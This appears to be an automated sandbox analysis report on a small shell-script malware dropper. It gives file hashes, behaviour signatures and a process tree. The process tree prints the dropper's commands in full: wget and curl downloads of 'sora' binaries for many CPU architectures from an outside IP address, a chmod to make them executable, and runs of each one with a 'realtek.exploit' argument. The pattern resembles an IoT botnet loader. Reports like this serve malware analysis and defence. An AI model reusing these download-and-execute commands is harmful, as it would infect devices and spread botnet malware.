Analysis
-
max time kernel
83s -
max time network
86s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:36
Static task
static1
Behavioral task
behavioral1
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
-
Size
2KB
-
MD5
2a963ff4fb99086ab454f4f26acf8b74
-
SHA1
0830412185a29f4230a85d8f6eb4d15f2a165aea
-
SHA256
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
-
SHA512
7317b366deb9f38c93b54f2b7e877c2b33bb864f26e49d356446c16292f76fcf7005c5ff4540e8551f5c80c13e5964137d9f545744ce309a24016733244f01d1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 755 chmod 783 chmod 836 chmod 851 chmod 734 chmod 746 chmod 842 chmod 867 chmod 727 chmod 823 chmod 767 chmod 830 chmod 740 chmod 805 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 728 robben /tmp/robben 735 robben /tmp/robben 741 robben /tmp/robben 747 robben /tmp/robben 756 robben /tmp/robben 768 robben /tmp/robben 784 robben /tmp/robben 806 robben /tmp/robben 824 robben /tmp/robben 831 robben /tmp/robben 837 robben /tmp/robben 843 robben /tmp/robben 852 robben /tmp/robben 868 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 730 wget 731 curl 733 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
Processes
-
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh1⤵
- Writes file to tmp directory
PID:697 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:703
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:719
-
-
/bin/catcat sora.x862⤵PID:725
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF62⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:728
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:730
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:731
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF62⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:738
-
-
/bin/catcat sora.x86_642⤵PID:739
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF62⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:743
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:744
-
-
/bin/catcat sora.i4682⤵PID:745
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF62⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:747
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:749
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:750
-
-
/bin/catcat sora.i6862⤵PID:754
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:758
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:759
-
-
/bin/catcat sora.mpsl2⤵PID:766
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:768
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:771
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:774
-
-
/bin/catcat sora.arm42⤵PID:781
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:784
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:786
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:795
-
-
/bin/catcat sora.arm52⤵PID:804
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:806
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:809
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:815
-
-
/bin/catcat sora.arm62⤵PID:822
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:826
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:828
-
-
/bin/catcat sora.arm72⤵PID:829
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:831
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:833
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:834
-
-
/bin/catcat sora.ppc2⤵PID:835
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:837
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:839
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:840
-
-
/bin/catcat sora.ppc440fp2⤵PID:841
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:845
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:846
-
-
/bin/catcat sora.m68k2⤵PID:849
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:852
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:855
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:858
-
-
/bin/catcat sora.sh42⤵PID:865
-
-
/bin/chmodchmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/robben./robben realtek.exploit2⤵
- Executes dropped EXE
PID:868
-